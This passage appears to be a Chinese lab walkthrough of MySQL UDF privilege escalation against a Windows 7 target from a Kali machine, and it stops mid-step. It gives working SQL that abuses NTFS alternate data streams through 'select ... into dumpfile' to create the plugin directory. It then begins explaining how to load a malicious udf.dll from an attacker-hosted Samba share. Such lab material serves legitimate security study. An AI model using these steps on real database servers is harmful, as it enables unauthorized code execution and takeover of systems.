环境:
1、靶机:192.168.186.128 win7 MySQL5.5.29
2、攻击机:192.168.186.130 kali
3、MySQL安装没有所需的lib/plugin目录,需通过ADS创建。
首先查询mysql所在目录 select @@basedir (或 select @@datadir)
如不存在lib/plugin目录,利用ADS创建目录,分步执行:
select 'xxx' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION';
select 'xxx' into dumpfile 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
会报错,但该目录已创建
再次执行上面语句会提示目录已存在
目录创建好后,参照如下两种方式在该目录下写入udf.dll文件
方式一
1、kali配置samba。kali共享文件。UDF文件复制到共享目录中,在靶机中使用load_file加